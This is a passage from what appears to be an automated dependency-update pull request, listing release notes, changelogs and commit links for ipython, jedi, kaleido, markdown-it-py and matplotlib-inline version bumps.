href=\"https://github.com/ipython/ipython/commit/d8b9d11f2796300d914a88dc08de35ce93bc5aa0\"\u003e\u003ccode\u003ed8b9d11\u003c/code\u003e\u003c/a\u003e Add IPython 9.14 release notes (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15228\"\u003e#15228\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/80cc1b963349ebc472b69f7da505cccebb2e6ad5\"\u003e\u003ccode\u003e80cc1b9\u003c/code\u003e\u003c/a\u003e Apply suggestions from code review\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/99feaadc543d43abc9287734651f4b618305a6bb\"\u003e\u003ccode\u003e99feaad\u003c/code\u003e\u003c/a\u003e Prepare release notes for 9.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/d0f27b7c656568b30d26bfcbe4232a6254abd64c\"\u003e\u003ccode\u003ed0f27b7\u003c/code\u003e\u003c/a\u003e directive typo (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15225\"\u003e#15225\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/85f520ed0bbfb7a17d91ce18fd9dfefb8c2acfdd\"\u003e\u003ccode\u003e85f520e\u003c/code\u003e\u003c/a\u003e directive typo\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/4c3e934d97015e18f90c1b91d0b1d7936ae81d77\"\u003e\u003ccode\u003e4c3e934\u003c/code\u003e\u003c/a\u003e Fix docstring formatting for prompt_line_number_format help text (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15224\"\u003e#15224\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/4f88be10853e080303b51a71ce13a550297368db\"\u003e\u003ccode\u003e4f88be1\u003c/code\u003e\u003c/a\u003e DOC: Fix RST inline literal warning in prompt_line_number_format docstring\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/37211dc6d4ab956a7b2ad851a0c10a359a8f87e1\"\u003e\u003ccode\u003e37211dc\u003c/code\u003e\u003c/a\u003e DOC: Add sphinx_toml to docs/requirements.txt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/ipython/commit/433aa8e69e71c6a2caa53621c0a670141c617c5d\"\u003e\u003ccode\u003e433aa8e\u003c/code\u003e\u003c/a\u003e Fix broken 'Edit on GitHub' link for auto-generated API docs (\u003ca href=\"https://redirect.github.com/ipython/ipython/issues/15218\"\u003e#15218\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ipython/ipython/compare/9.12.0...9.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jedi` from 0.19.2 to 0.20.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/davidhalter/jedi/blob/master/CHANGELOG.rst\"\u003ejedi's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e0.20.0 (2026-05-02)\n+++++++++++++++++++\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003ePython 3.14 support\u003c/li\u003e\n\u003cli\u003eRemoved support for Python 3.8 and 3.9\u003c/li\u003e\n\u003cli\u003eUpgraded Typeshed\u003c/li\u003e\n\u003cli\u003eBetter support for Final/ClassVar\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e__new__\u003c/code\u003e is now also recognized as a signature and TypeVar inference\u003c/li\u003e\n\u003cli\u003eSupport for \u003ccode\u003eSelf\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSupport for \u003ccode\u003eTypeAlias\u003c/code\u003e, generics for \u003ccode\u003etype[...]\u003c/code\u003e and \u003ccode\u003etuple[...]\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/3102215478fe07b965dcd8221c17436d1dd7e8ac\"\u003e\u003ccode\u003e3102215\u003c/code\u003e\u003c/a\u003e Move the type parameter syntax tests so that it works for all versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/1b37f2eb946e825cbc2887c6dd34ee046f0ae68c\"\u003e\u003ccode\u003e1b37f2e\u003c/code\u003e\u003c/a\u003e Prepare for the 0.20.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/8e4df5cc0ec511db1af6d358182b1fb7c1e0cbff\"\u003e\u003ccode\u003e8e4df5c\u003c/code\u003e\u003c/a\u003e Make sure the new generic syntax does not fail with latest parso\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/4c9dbcca0329454b638bfa32e2825bedcfdf0eac\"\u003e\u003ccode\u003e4c9dbcc\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/davidhalter/jedi/issues/2098\"\u003e#2098\u003c/a\u003e from davidhalter/updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/fedb1a5eb0d74446f6d431db2920ab5f1e1d5b18\"\u003e\u003ccode\u003efedb1a5\u003c/code\u003e\u003c/a\u003e Fix 3.10 tests in one more case\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/87e782f9c82de7297e243a770ac8888570bffa8e\"\u003e\u003ccode\u003e87e782f\u003c/code\u003e\u003c/a\u003e Fix flake8\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/cd52d982e10ac54f0ebef06e0bd414f79589998a\"\u003e\u003ccode\u003ecd52d98\u003c/code\u003e\u003c/a\u003e Fixes to get the tests passing for 3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/d0b11806d4d1def377234bc2dc512992c997a977\"\u003e\u003ccode\u003ed0b1180\u003c/code\u003e\u003c/a\u003e Finally make tests work for 3.14\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/8520a9958b489bd8d30cf20b4d2798f7289aab45\"\u003e\u003ccode\u003e8520a99\u003c/code\u003e\u003c/a\u003e Implement support for TypeVar inference for \u003cstrong\u003enew\u003c/strong\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/davidhalter/jedi/commit/55e5f0cb92dd92d5bdc80ecfc38664a1afd921d1\"\u003e\u003ccode\u003e55e5f0c\u003c/code\u003e\u003c/a\u003e Implement new-style unions with TypeVars\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/davidhalter/jedi/compare/v0.19.2...v0.20.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `kaleido` from 1.2.0 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/plotly/kaleido/releases\"\u003ekaleido's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow for request headers to be added to Choreographer calls [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/446\"\u003e#446\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSignificant refactor, better organization\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewrite_fig\u003c/code\u003e and \u003ccode\u003e_from_object\u003c/code\u003e now take an additional argument:\n\u003ccode\u003ecancel_on_error: bool, default False\u003c/code\u003e. See docs.\u003c/li\u003e\n\u003cli\u003eUpdate Choreographer to v1.3.0 [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/449\"\u003e#449\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDeprecated\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUnused \u003ccode\u003epath\u003c/code\u003e argument for \u003ccode\u003ecalc_fig\u003c/code\u003e was deprecated.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed race condition where two render tasks would choose the same filename\u003c/li\u003e\n\u003cli\u003eFix issue where exporting large figures could cause hang [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/442\"\u003e#442\u003c/a\u003e], with thanks to \u003ca href=\"https://github.com/EliasTalcott\"\u003e\u003ccode\u003e@​EliasTalcott\u003c/code\u003e\u003c/a\u003e for the contribution!\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/plotly/Kaleido/blob/master/CHANGELOG.md\"\u003ekaleido's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.3.0\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAllow for request headers to be added to Choreographer calls [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/446\"\u003e#446\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSignificant refactor, better organization\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewrite_fig\u003c/code\u003e and \u003ccode\u003e_from_object\u003c/code\u003e now take an additional argument:\n\u003ccode\u003ecancel_on_error: bool, default False\u003c/code\u003e. See docs.\u003c/li\u003e\n\u003cli\u003eUpdate Choreographer to v1.3.0 [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/449\"\u003e#449\u003c/a\u003e]\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDeprecated\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUnused \u003ccode\u003epath\u003c/code\u003e argument for \u003ccode\u003ecalc_fig\u003c/code\u003e was deprecated.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFixed race condition where two render tasks would choose the same filename\u003c/li\u003e\n\u003cli\u003eFix issue where exporting large figures could cause hang [\u003ca href=\"https://redirect.github.com/plotly/Kaleido/pull/442\"\u003e#442\u003c/a\u003e], with thanks to \u003ca href=\"https://github.com/EliasTalcott\"\u003e\u003ccode\u003e@​EliasTalcott\u003c/code\u003e\u003c/a\u003e for the contribution!\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev1.3.0rc0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSignificant refactor, better organization\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ewrite_fig\u003c/code\u003e and \u003ccode\u003e_from_object\u003c/code\u003e now take an additional argument:\n\u003ccode\u003ecancel_on_error: bool, default False\u003c/code\u003e. See docs.\u003c/li\u003e\n\u003cli\u003eUnused \u003ccode\u003epath\u003c/code\u003e argument for \u003ccode\u003ecalc_fig\u003c/code\u003e was deprecated.\u003c/li\u003e\n\u003cli\u003eFixed race condition where two render tasks would choose the same filename\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/b7a00c41895ab71b67e5b89b40f186c3f1cecbed\"\u003e\u003ccode\u003eb7a00c4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/451\"\u003e#451\u003c/a\u003e from plotly/release-v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/423a4f1cc6cbc701f9238281d63324508f12a272\"\u003e\u003ccode\u003e423a4f1\u003c/code\u003e\u003c/a\u003e Update setuptools config to find required subpackages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/28131a743143cc5d134c6e962b603ff3a5ed6253\"\u003e\u003ccode\u003e28131a7\u003c/code\u003e\u003c/a\u003e Updates for release v1.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/f72dc86fa75afbca8756fcd9c9b5af550f038d75\"\u003e\u003ccode\u003ef72dc86\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/366\"\u003e#366\u003c/a\u003e from tschm/patch-3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/0c5e89030709bc873806c08542ae66afea304f71\"\u003e\u003ccode\u003e0c5e890\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/450\"\u003e#450\u003c/a\u003e from plotly/cam/js-dependency-updates-may-2026\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/4e95de54ad7874e254665444070cf613104749f5\"\u003e\u003ccode\u003e4e95de5\u003c/code\u003e\u003c/a\u003e Bump pygments from 2.19.2 to 2.20.0 in /src/py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/90ddc9d7e83d4b27cc11a44a9ca15c5d2c6c5688\"\u003e\u003ccode\u003e90ddc9d\u003c/code\u003e\u003c/a\u003e Bump urllib3 from 2.2.3 to 2.6.3 in /src/py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/f9b850eb38d7d9bb3f24258012d776f03ad355a0\"\u003e\u003ccode\u003ef9b850e\u003c/code\u003e\u003c/a\u003e chore: Update JS dependencies for security fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/0978e65f23fbba486d005df1508e008a080d20e4\"\u003e\u003ccode\u003e0978e65\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/432\"\u003e#432\u003c/a\u003e from plotly/dependabot/npm_and_yarn/src/js/minimatch-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/plotly/Kaleido/commit/b639582c0416f48a682ad01d157af22881d94f75\"\u003e\u003ccode\u003eb639582\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/plotly/kaleido/issues/429\"\u003e#429\u003c/a\u003e from plotly/dependabot/npm_and_yarn/src/js/qs-6.14.2\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/plotly/kaleido/compare/v1.2.0...v1.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `markdown-it-py` from 4.0.0 to 4.2.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/executablebooks/markdown-it-py/releases\"\u003emarkdown-it-py's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.2.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ Add \u003ccode\u003emake_fence_rule()\u003c/code\u003e factory for configurable fence markers by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/394\"\u003eexecutablebooks/markdown-it-py#394\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🚀 RELEASE v4.2.0 by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/395\"\u003eexecutablebooks/markdown-it-py#395\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/executablebooks/markdown-it-py/compare/v4.1.0...v4.2.0\"\u003ehttps://github.com/executablebooks/markdown-it-py/compare/v4.1.0...v4.2.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.1.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ Add \u003ccode\u003e--stdin\u003c/code\u003e option to CLI by \u003ca href=\"https://github.com/mcepl\"\u003e\u003ccode\u003e@​mcepl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/379\"\u003eexecutablebooks/markdown-it-py#379\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd AGENTS.md and copilot-setup-steps workflow by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/380\"\u003eexecutablebooks/markdown-it-py#380\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🔧 Add typing to Scanner by \u003ca href=\"https://github.com/Alunderin\"\u003e\u003ccode\u003e@​Alunderin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/382\"\u003eexecutablebooks/markdown-it-py#382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e👌 Fix quadratic complexity in \u003ccode\u003efragments_join\u003c/code\u003e / \u003ccode\u003etext_join\u003c/code\u003e by \u003ca href=\"https://github.com/petricevich\"\u003e\u003ccode\u003e@​petricevich\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/389\"\u003eexecutablebooks/markdown-it-py#389\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e✨Allow plugins to register inline terminator characters by \u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/391\"\u003eexecutablebooks/markdown-it-py#391\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e✨ Add \u003ccode\u003egfm-like2\u003c/code\u003e preset with task lists, alerts, and single-tilde strikethrough by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/388\"\u003eexecutablebooks/markdown-it-py#388\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🔧 Update pre-commit hooks by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/392\"\u003eexecutablebooks/markdown-it-py#392\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🚀 RELEASE v4.1.0 by \u003ca href=\"https://github.com/chrisjsewell\"\u003e\u003ccode\u003e@​chrisjsewell\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/393\"\u003eexecutablebooks/markdown-it-py#393\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mcepl\"\u003e\u003ccode\u003e@​mcepl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/379\"\u003eexecutablebooks/markdown-it-py#379\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Copilot\"\u003e\u003ccode\u003e@​Copilot\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/380\"\u003eexecutablebooks/markdown-it-py#380\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Alunderin\"\u003e\u003ccode\u003e@​Alunderin\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/382\"\u003eexecutablebooks/markdown-it-py#382\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/petricevich\"\u003e\u003ccode\u003e@​petricevich\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/389\"\u003eexecutablebooks/markdown-it-py#389\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.1.0\"\u003ehttps://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/executablebooks/markdown-it-py/blob/master/CHANGELOG.md\"\u003emarkdown-it-py's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.2.0 - 2026-05-07\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ Add \u003ccode\u003emake_fence_rule()\u003c/code\u003e factory for configurable fence markers in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/394\"\u003e#394\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.1.0 - 2025-05-06\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e✨ Add \u003ccode\u003egfm-like2\u003c/code\u003e preset with task lists, alerts, and single-tilde strikethrough core plugins in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/388\"\u003e#388\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e✨ Allow plugins to register inline terminator characters in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/391\"\u003e#391\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e👌 Fix quadratic complexity in \u003ccode\u003efragments_join\u003c/code\u003e / \u003ccode\u003etext_join\u003c/code\u003e in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/389\"\u003e#389\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/petricevich\"\u003e\u003ccode\u003e@​petricevich\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e👌 Add \u003ccode\u003e--stdin\u003c/code\u003e option to CLI for reading Markdown from standard input in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/379\"\u003e#379\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/mcepl\"\u003e\u003ccode\u003e@​mcepl\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e🔧 Add typing to Scanner in \u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/pull/382\"\u003e#382\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/Alunderin\"\u003e\u003ccode\u003e@​Alunderin\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.1.0\"\u003ehttps://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.1.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/36c5f547144df2d01970a5792d68c71a3380b227\"\u003e\u003ccode\u003e36c5f54\u003c/code\u003e\u003c/a\u003e 🚀 RELEASE v4.2.0 (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/395\"\u003e#395\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/96cf077ba5a6b3b4b2f862db7e0fc532694a72e9\"\u003e\u003ccode\u003e96cf077\u003c/code\u003e\u003c/a\u003e ✨ Add \u003ccode\u003emake_fence_rule()\u003c/code\u003e factory for configurable fence markers (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/394\"\u003e#394\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/3b4ff6ddd368b679643d12debf09e10ef602d4db\"\u003e\u003ccode\u003e3b4ff6d\u003c/code\u003e\u003c/a\u003e 🚀 RELEASE v4.1.0 (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/393\"\u003e#393\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/8951f267370b03a26ae88600a6dfc707ea290067\"\u003e\u003ccode\u003e8951f26\u003c/code\u003e\u003c/a\u003e 🔧 Update pre-commit hooks (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/392\"\u003e#392\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/693bb24063b6c658d60c7c14203ac6470387e3c6\"\u003e\u003ccode\u003e693bb24\u003c/code\u003e\u003c/a\u003e ✨ Add \u003ccode\u003egfm-like2\u003c/code\u003e preset with task lists, alerts, and single-tilde strikethro...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/df6fd361099cab7fe0259467c3aaa3f284ec8259\"\u003e\u003ccode\u003edf6fd36\u003c/code\u003e\u003c/a\u003e ✨Allow plugins to register inline terminator characters (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/391\"\u003e#391\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/d4ea0ca7f44e3ca86c18a87356502c59e5e49ec3\"\u003e\u003ccode\u003ed4ea0ca\u003c/code\u003e\u003c/a\u003e 👌 Fix quadratic complexity in \u003ccode\u003efragments_join\u003c/code\u003e / \u003ccode\u003etext_join\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/389\"\u003e#389\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/89331476e44c150bc32e2597a5fae4cd15391167\"\u003e\u003ccode\u003e8933147\u003c/code\u003e\u003c/a\u003e 🔧 Add typing to Scanner (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/382\"\u003e#382\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/2f6ae107ba32e9a7bd2d00134d09a78ec805a6a0\"\u003e\u003ccode\u003e2f6ae10\u003c/code\u003e\u003c/a\u003e 🔧 Add AGENTS.md and copilot-setup-steps workflow (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/380\"\u003e#380\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/executablebooks/markdown-it-py/commit/49043e4445d233598fb893bed6949f7b25ae4e27\"\u003e\u003ccode\u003e49043e4\u003c/code\u003e\u003c/a\u003e Add --stdin option to CLI for reading Markdown from standard input (\u003ca href=\"https://redirect.github.com/executablebooks/markdown-it-py/issues/379\"\u003e#379\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/executablebooks/markdown-it-py/compare/v4.0.0...v4.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `matplotlib-inline` from 0.2.1 to 0.2.2\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ipython/matplotlib-inline/commit/e6e197523ecfabfff1d976e5b6958c3ede948ccb\"\u003e\u003ccode\u003ee6e1975\u003c/code\u003e\u003c/a\u003e release 0.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca 